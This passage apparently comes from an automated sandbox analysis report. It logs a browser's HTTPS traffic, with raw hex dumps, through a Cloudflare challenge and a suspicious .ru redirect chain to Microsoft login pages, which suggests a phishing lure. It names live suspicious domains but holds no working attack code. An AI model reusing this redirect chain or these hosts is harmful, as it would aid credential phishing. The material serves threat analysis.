                                                                        2025-01-16 08:20:32 UTC16384OUTData Raw: 76 5f 39 30 32 63 61 66 38 34 30 65 61 61 37 63 65 38 3d 42 4a 59 6f 43 6e 53 74 2d 63 4a 76 4a 76 38 4a 53 79 53 63 50 77 47 74 76 69 53 53 68 4c 76 31 6f 59 2d 53 62 76 52 6f 63 71 76 30 76 71 2d 77 63 70 32 64 76 25 32 62 44 76 32 77 6f 76 4c 75 76 4a 6f 79 4a 76 49 57 53 6f 6e 54 76 50 39 6f 74 69 76 34 71 76 54 76 7a 71 76 74 68 6c 77 32 73 53 76 63 71 32 30 6f 44 46 32 32 70 35 58 76 46 57 52 76 74 6f 34 52 7a 52 30 24 71 76 64 76 6d 6d 46 42 38 38 79 76 76 70 2d 76 57 7a 76 76 57 74 6d 59 76 74 39 52 76 6e 62 52 4b 50 35 46 39 33 6f 53 2b 79 64 4a 71 44 67 44 70 4e 58 79 4b 59 42 6e 5a 6c 7a 6f 68 33 52 59 51 4f 71 7a 24 45 76 53 32 59 4f 79 79 46 52 2b 42 68 47 34 69 48 35 48 56 71 2d 53 42 79 65 72 39 34 6a 49 6c 55 24 64 56 56 50 32 44 39 65 61
                                                                        Data Ascii: v_902caf840eaa7ce8=BJYoCnSt-cJvJv8JSyScPwGtviSShLv1oY-SbvRocqv0vq-wcp2dv%2bDv2wovLuvJoyJvIWSonTvP9otiv4qvTvzqvthlw2sSvcq20oDF22p5XvFWRvto4RzR0$qvdvmmFB88yvvp-vWzvvWtmYvt9RvnbRKP5F93oS+ydJqDgDpNXyKYBnZlzoh3RYQOqz$EvS2YOyyFR+BhG4iH5HVq-SByer94jIlU$dVVP2D9ea
                                                                        2025-01-16 08:20:32 UTC16384OUTData Raw: 6b 51 68 52 4c 6f 4b 64 4f 74 52 52 4b 44 53 49 51 36 51 52 76 68 4a 34 6f 6e 59 76 67 76 68 4a 53 70 76 62 76 67 4b 6e 2d 50 7a 76 45 69 6e 79 76 6f 77 76 54 53 53 68 30 6f 42 2d 76 4d 70 76 38 76 59 32 6e 76 70 6f 42 2d 44 70 76 56 6f 63 2d 6e 41 76 58 76 53 2d 76 4e 76 54 6f 34 76 6e 68 76 73 6f 45 66 4a 6b 76 2b 6f 34 76 76 79 53 46 6d 59 77 32 45 55 4d 76 4f 2d 53 34 30 5a 71 47 57 57 47 30 2b 62 75 66 76 69 76 74 76 59 4a 32 45 55 2b 76 59 4a 6e 70 76 69 59 63 77 53 63 71 2b 76 46 6f 76 71 76 42 59 42 77 53 42 64 24 63 45 70 6e 6e 53 4c 7a 6f 44 6f 33 6e 31 4a 76 6f 32 4c 76 33 6f 46 70 6e 45 76 31 6f 68 76 32 6d 6b 4c 6f 59 4a 76 54 76 62 76 42 2d 53 64 76 47 6f 4f 5a 71 59 76 48 65 44 71 6e 5a 68 6a 76 34 6f 41 4f 59 6e 76 72 77 6e 6e 53 4e 71 72
                                                                        Data Ascii: kQhRLoKdOtRRKDSIQ6QRvhJ4onYvgvhJSpvbvgKn-PzvEinyvowvTSSh0oB-vMpv8vY2nvpoB-DpvVoc-nAvXvS-vNvTo4vnhvsoEfJkv+o4vvySFmYw2EUMvO-S40ZqGWWG0+bufvivtvYJ2EU+vYJnpviYcwScq+vFovqvBYBwSBd$cEpnnSLzoDo3n1Jvo2Lv3oFpnEv1ohv2mkLoYJvTvbvB-SdvGoOZqYvHeDqnZhjv4oAOYnvrwnnSNqr
                                                                        2025-01-16 08:20:32 UTC1853OUTData Raw: 79 69 6c 76 67 32 24 77 6e 53 59 41 31 4b 46 73 46 42 24 76 63 69 37 41 38 33 6e 32 56 4f 4d 2d 32 41 50 71 53 4b 6d 4a 56 4f 71 6e 58 36 62 6d 54 62 66 79 44 46 71 53 56 2b 57 76 36 6e 6d 62 2b 6e 24 72 76 45 45 76 5a 24 4c 69 32 76 32 5a 49 61 54 6b 49 45 4a 76 6e 6f 72 65 62 36 48 4b 2d 6e 50 68 45 76 48 30 47 76 32 43 35 5a 71 6e 51 30 2d 43 6b 2d 30 74 32 46 61 66 76 59 39 6a 55 66 72 49 73 74 6e 59 6c 6e 59 32 65 6b 6c 34 6b 71 76 57 35 63 76 34 6c 71 2d 53 64 5a 49 52 36 74 76 34 39 41 43 57 69 53 37 47 74 76 67 6f 6e 6c 76 54 6b 32 41 58 49 5a 32 76 59 4d 6a 41 49 5a 6e 7a 59 41 46 2b 4f 67 50 70 76 6a 49 62 6f 32 47 4b 66 76 6f 6f 45 58 4a 41 2d 65 76 46 48 50 4b 74 41 76 76 6f 76 58 36 5a 77 79 69 42 31 24 56 48 66 59 44 30 54 77 55 2d 61 4d 34
                                                                        Data Ascii: yilvg2$wnSYA1KFsFB$vci7A83n2VOM-2APqSKmJVOqnX6bmTbfyDFqSV+Wv6nmb+n$rvEEvZ$Li2v2ZIaTkIEJvnoreb6HK-nPhEvH0Gv2C5ZqnQ0-Ck-0t2FafvY9jUfrIstnYlnY2ekl4kqvW5cv4lq-SdZIR6tv49ACWiS7GtvgonlvTk2AXIZ2vYMjAIZnzYAF+OgPpvjIbo2GKfvooEXJA-evFHPKtAvvovX6ZwyiB1$VHfYD0TwU-aM4
                                                                        2025-01-16 08:20:33 UTC1308INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 4624
                                                                        Connection: close
                                                                        cf-chl-out-s: 1kTfsS5F3hFKJKmzkl86QaP49w9cxETldfvQC81j+UV+DI6BNuHBIQC0T4RUSP59e+cVyJopJYmlwsGILRmgEIWYsiH8fwbeJAtInJUnTePpn+TllDtJbPblYJqOJGsrvueBl0dqLhL7rSeHV8rUNshczftRLEc+kjaLRduQ+oxACe+vn1QgzytBBpvq1viotybeL8emb5v+X5cKy9Bp7xVALolSf6XlV7iNs+YYeO4FCxs2A69K3hyiuEkuGF4WyNmRyjxG8pEpNQu/RTQ/+iI7RbG7LyCkk+rDwuGBZFrlwaaX76vJJrMP3xPXiApydUdguJmAj/p6BqhL3f07Rdp4scvtcKKGo7m9F2qY03Ee44cBLzJPdaIXqVhzMRIgBxmEsRqH7W6hHNv+jlvp/hS3npNyf1Z7+thZ/MAJqSZn/wyZmViAl52Lp74zl0Qe2IV23UD+zt9HtansAIWbURTKtZL3GvqI8Hb6HJg00oE5qLOaI7hKa/j0yTMnpo2Chdv+FunNRsknf0xy6Oau1o+bevIbxE99mnhK/Da1sdj8HCb6xyMNe1DhQ1CxTX7iWhmG+0lH9PahRt6Evt35RJjEf4vKMeWOmN41njpGqWxp59rNGNdTCjjw/ha8z4UV+7s7GYB2buWNwvlxdjX++4NVPOHjfzWrXJGoIMpvQPdij/6LzX9Vl5obTun4ligCDUqNuZZpmI0cgS/eL0dPGsvLfn7UF0j9qyTqhvF19EZ5vBCDxdwJ11y3u6IGtY+gAmRCoPgYasGLUJmJWfo3g6QcMvchskJURNAm4B3J7Kkre4+gcboJal3V/6baLaBxbM4PIAE7BOCRayFVFGr7s5WupFa/sRruiIOjIl6mzq+vPS5Y/iUfvdjFeBPX5BiUT13NrlZMAMfutHcRwZEeJq+uEysyN4hkag6ykMOpfcm7poLb4vEWIrgMDiXW5Jui1Kar9Wgp8Lb7NU5VrJByCvjpoB0Ea0oxXPTq/UGKFvhgDlQXbG [TRUNCATED]
                                                                        2025-01-16 08:20:33 UTC229INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 5a 36 4e 55 37 41 4b 41 33 72 2b 30 4d 73 45 42 72 78 57 45 4d 36 64 37 61 47 4b 54 45 42 6d 4c 4c 50 50 2b 37 48 55 2f 75 4d 46 63 50 58 4e 4e 39 66 6e 4a 7a 68 77 6c 78 73 75 62 33 65 58 70 35 6d 50 4a 2b 41 75 35 65 58 2f 58 54 53 4c 54 46 5a 62 5a 31 78 65 48 36 63 54 6e 70 63 39 59 74 44 69 69 5a 33 76 58 65 2b 73 3d 24 4c 2b 75 50 2b 33 2f 4d 57 45 65 37 4c 54 2b 66 66 30 4c 4a 78 77 3d 3d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 63 61 66 64 39 65 38 36 63 30 63 37 65 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                        Data Ascii: cf-chl-out: Z6NU7AKA3r+0MsEBrxWEM6d7aGKTEBmLLPP+7HU/uMFcPXNN9fnJzhwlxsub3eXp5mPJ+Au5eX/XTSLTFZbZ1xeH6cTnpc9YtDiiZ3vXe+s=$L+uP+3/MWEe7LT+ff0LJxw==Server: cloudflareCF-RAY: 902cafd9e86c0c7e-EWRalt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:33 UTC1201INData Raw: 6d 58 4b 53 70 70 6d 4a 73 62 32 56 6a 4c 6e 44 6d 36 47 37 75 4a 54 43 6e 4c 36 34 72 4c 43 4d 76 38 62 43 7a 63 44 53 73 4a 50 46 75 36 57 6b 30 35 69 6f 75 4e 4f 2f 77 72 4c 45 6e 65 47 65 77 64 7a 6c 6f 73 4b 35 33 73 50 48 38 76 48 79 79 61 37 34 7a 4e 62 71 37 62 4c 54 37 2f 47 2b 30 2f 58 43 77 64 66 69 76 66 54 6c 35 66 6b 4f 34 41 38 43 45 65 63 53 35 66 44 66 37 64 45 51 34 64 41 64 47 4e 77 64 37 66 6e 75 47 64 2f 61 45 41 66 78 46 77 73 4a 48 79 77 57 36 66 33 34 49 4f 73 6c 38 78 63 59 49 42 49 74 48 44 4d 2b 4c 76 6f 65 48 6a 48 39 4f 42 67 36 4e 45 4e 46 45 69 51 4c 4c 51 34 6e 47 79 45 38 54 55 59 75 44 7a 41 7a 4c 30 51 55 46 31 6b 70 4b 56 45 71 59 56 39 64 48 45 42 58 4d 31 5a 43 4f 6c 70 72 4f 56 78 6e 63 53 68 67 4d 69 63 2b 51 46 64
                                                                        Data Ascii: mXKSppmJsb2VjLnDm6G7uJTCnL64rLCMv8bCzcDSsJPFu6Wk05iouNO/wrLEneGewdzlosK53sPH8vHyya74zNbq7bLT7/G+0/XCwdfivfTl5fkO4A8CEecS5fDf7dEQ4dAdGNwd7fnuGd/aEAfxFwsJHywW6f34IOsl8xcYIBItHDM+LvoeHjH9OBg6NENFEiQLLQ4nGyE8TUYuDzAzL0QUF1kpKVEqYV9dHEBXM1ZCOlprOVxncShgMic+QFd
                                                                        2025-01-16 08:20:33 UTC1369INData Raw: 68 34 6a 2f 52 6f 55 48 42 6b 68 53 67 4d 59 4c 55 38 58 53 69 77 76 52 51 38 75 49 53 51 34 4b 79 74 4a 55 44 46 56 56 69 70 58 55 30 74 41 4f 6a 45 34 4e 30 45 6d 53 55 73 2b 4f 30 39 72 53 7a 31 54 4c 55 74 33 63 6b 46 4f 56 46 78 56 63 54 5a 78 4f 6c 35 64 56 7a 39 64 59 33 56 36 57 34 42 48 59 32 74 46 53 32 68 70 68 59 47 4d 63 45 32 43 68 32 32 4b 6a 5a 78 75 61 57 79 49 64 59 4e 37 58 6e 6d 42 63 32 61 47 6e 59 53 44 6f 49 6d 75 68 59 32 53 63 4a 4f 4f 62 5a 53 47 6b 6f 57 4d 6d 4a 4f 2f 73 36 47 55 6e 37 75 6b 6f 5a 44 47 6b 36 47 47 71 4b 44 44 76 6f 36 49 78 38 50 42 6b 38 6d 4e 70 39 4f 33 6c 72 76 59 74 62 6e 4a 6e 39 66 6a 7a 73 47 34 31 73 6a 44 78 4c 54 69 78 38 33 57 77 4f 48 44 77 2b 72 50 7a 65 66 71 32 4d 2b 32 37 62 62 56 74 73 6e 66
                                                                        Data Ascii: h4j/RoUHBkhSgMYLU8XSiwvRQ8uISQ4KytJUDFVVipXU0tAOjE4N0EmSUs+O09rSz1TLUt3ckFOVFxVcTZxOl5dVz9dY3V6W4BHY2tFS2hphYGMcE2Ch22KjZxuaWyIdYN7XnmBc2aGnYSDoImuhY2ScJOObZSGkoWMmJO/s6GUn7ukoZDGk6GGqKDDvo6Ix8PBk8mNp9O3lrvYtbnJn9fjzsG41sjDxLTix83WwOHDw+rPzefq2M+27bbVtsnf
                                                                        2025-01-16 08:20:33 UTC1369INData Raw: 63 68 51 6a 30 46 49 44 38 62 44 43 30 69 54 78 38 4f 46 56 4d 72 57 55 77 6c 4a 7a 4d 59 4d 31 56 5a 50 42 55 69 56 6d 51 31 55 46 51 6e 4f 44 5a 44 4a 45 6b 36 61 6a 38 6c 55 31 41 78 63 33 52 4c 4f 44 74 76 55 31 56 71 65 45 6c 52 51 46 56 32 66 45 42 6e 65 49 42 6c 59 6e 31 4b 66 31 39 73 54 59 64 75 68 56 46 55 62 6f 68 56 6d 32 6d 4d 56 46 57 63 67 5a 43 63 63 49 4a 69 5a 33 65 62 5a 4a 56 33 6c 59 4b 6a 65 57 65 6d 71 34 4f 6d 68 34 43 72 72 49 70 7a 65 71 36 65 72 35 4f 78 6f 37 4b 2f 74 59 36 58 71 62 36 6a 77 4b 4b 45 72 63 76 44 77 38 6d 66 76 63 53 6b 31 6f 37 43 71 4d 61 63 79 74 4b 64 6d 73 72 43 6f 4c 62 56 74 36 43 35 32 37 79 35 78 4a 2b 35 72 73 66 50 79 66 4f 2f 73 75 44 79 73 4e 57 79 32 4c 6e 74 33 4c 6a 74 38 66 66 72 37 65 48 43 75
                                                                        Data Ascii: chQj0FID8bDC0iTx8OFVMrWUwlJzMYM1VZPBUiVmQ1UFQnODZDJEk6aj8lU1Axc3RLODtvU1VqeElRQFV2fEBneIBlYn1Kf19sTYduhVFUbohVm2mMVFWcgZCccIJiZ3ebZJV3lYKjeWemq4Omh4CrrIpzeq6er5Oxo7K/tY6Xqb6jwKKErcvDw8mfvcSk1o7CqMacytKdmsrCoLbVt6C527y5xJ+5rsfPyfO/suDysNWy2Lnt3Ljt8ffr7eHCu
                                                                        2025-01-16 08:20:33 UTC685INData Raw: 50 42 6a 34 4d 43 78 4a 43 50 69 6b 75 53 68 55 6f 4f 6b 59 2b 56 7a 56 54 57 53 30 74 56 30 4e 49 47 6c 5a 63 59 30 4e 49 50 30 41 6d 5a 57 59 76 62 56 46 48 4e 47 52 6c 53 31 68 55 61 6b 34 33 56 48 4a 34 50 33 35 77 56 45 4f 41 64 58 35 6c 56 47 68 76 58 45 65 43 63 45 56 74 66 59 74 2f 59 6f 6d 51 61 57 39 34 62 70 75 4c 66 4a 64 38 5a 4a 75 62 63 58 79 66 69 31 32 42 69 57 68 6f 67 61 4b 6f 68 48 4f 67 71 36 65 4c 6b 36 32 63 6b 5a 68 32 69 62 43 72 6f 62 70 38 72 59 43 52 73 36 61 2f 68 4c 69 37 78 63 4b 50 77 63 6d 68 76 4d 71 53 6b 35 62 4e 71 39 71 78 79 71 37 65 6f 4e 50 59 6c 61 7a 5a 74 71 65 65 33 62 76 58 78 63 69 2b 6f 63 76 69 71 36 7a 4d 31 73 54 7a 7a 39 50 76 32 4e 4c 6e 33 62 65 34 36 62 37 67 2f 76 48 55 42 4e 7a 37 41 39 54 6e 36 4e
                                                                        Data Ascii: PBj4MCxJCPikuShUoOkY+VzVTWS0tV0NIGlZcY0NIP0AmZWYvbVFHNGRlS1hUak43VHJ4P35wVEOAdX5lVGhvXEeCcEVtfYt/YomQaW94bpuLfJd8ZJubcXyfi12BiWhogaKohHOgq6eLk62ckZh2ibCrobp8rYCRs6a/hLi7xcKPwcmhvMqSk5bNq9qxyq7eoNPYlazZtqee3bvXxci+ocviq6zM1sTzz9Pv2NLn3be46b7g/vHUBNz7A9Tn6N


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.549799104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:33 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:33 UTC442INHTTP/1.1 400 Bad Request
                                                                        Date: Thu, 16 Jan 2025 08:20:33 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 14
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        cf-chl-out: ZrPP3Yn/EPsBvMFaiRcQEz1yn0COpfjkDAtoaUz8NN0TM0KtH/9OjnOZ+PtQNlnRSTymEBF0+wUSRo4bBEVaLA==$XZruSGzMQxQKnDMH+HmDYw==
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafdeb92942d5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:33 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                        Data Ascii: {"err":100230}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.549806104.21.16.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:34 UTC654OUTGET /yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU HTTP/1.1
                                                                        Host: oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://56.hanagibenewe.ru
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:35 UTC890INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Access-Control-Allow-Origin: *
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yd1i0tf5niRw5lJ9ySlGxZvf6PWrO04ud99a1d2rtg8vbmi%2FnovdzJAgycSa23rgnxqn9cn1qVaCFMCf%2FYgXUbKTHdO5Tl%2FfHcUyknRyihwodpkkzfvEdzS%2Fm3LkWA6MdjD2zzWl4xwSFUZ6iGNAOgJyA0YvLwYcurSfiMBZMZ2wSpF4aGUbg1ZX%2BUoXmHioTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafe27f594388-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1546&rtt_var=586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1232&delivery_rate=1855146&cwnd=224&unsent_bytes=0&cid=64a7c79fa39494e7&ts=605&x=0"
                                                                        2025-01-16 08:20:35 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                        Data Ascii: 11
                                                                        2025-01-16 08:20:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.549814104.21.112.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:36 UTC444OUTGET /yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU HTTP/1.1
                                                                        Host: oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:36 UTC888INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Access-Control-Allow-Origin: *
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R35p63hkEfxL79u5SIhflgeGNXknVXw8rrZOyFDXPPtlQ4vlF1sDn9btMDnWT3WSzoqCCOBZKWO%2BusIdfu3RGXvKedWFAuqWQmsn2ipi8X5kNbmgM58NdBz0bnr8eyADqk%2FxgS0MgPEpOAI2CdZsW4j%2BEud0Dd0KrZWfleDDXVnhbnpkOFwAW8nYqCuQz2%2B6zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafeef99b43b3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1022&delivery_rate=1848101&cwnd=203&unsent_bytes=0&cid=0869be37627d91b4&ts=571&x=0"
                                                                        2025-01-16 08:20:36 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                        Data Ascii: 11
                                                                        2025-01-16 08:20:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.54981220.190.160.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:36 UTC712OUTGET / HTTP/1.1
                                                                        Host: login.microsoftonline.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:36 UTC1959INHTTP/1.1 302 Found
                                                                        Cache-Control: no-store, no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Expires: -1
                                                                        Location: https://www.office.com/login#
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        X-Content-Type-Options: nosniff
                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                        x-ms-request-id: afa04384-6b10-4880-be38-9c53c3493200
                                                                        x-ms-ests-server: 2.1.19870.3 - SEC ProdSlices
                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                        x-ms-srs: 1.P
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-vNA50qUa92WhdJIpde3lXQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                        X-XSS-Protection: 0
                                                                        Set-Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; expires=Sat, 15-Feb-2025 08:20:36 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                        Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                                        Date: Thu, 16 Jan 2025 08:20:36 GMT
                                                                        Connection: close
                                                                        Content-Length: 146
                                                                        2025-01-16 08:20:36 UTC146INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 2f 6c 6f 67 69 6e 23 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.office.com/login#">here</a>.</h2></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.54982513.107.6.1564433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:37 UTC706OUTGET /login HTTP/1.1
                                                                        Host: www.office.com
                                                                        Connection: keep-alive
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:37 UTC2242INHTTP/1.1 302 Found
                                                                        Content-Type: text/html; charset=utf-8
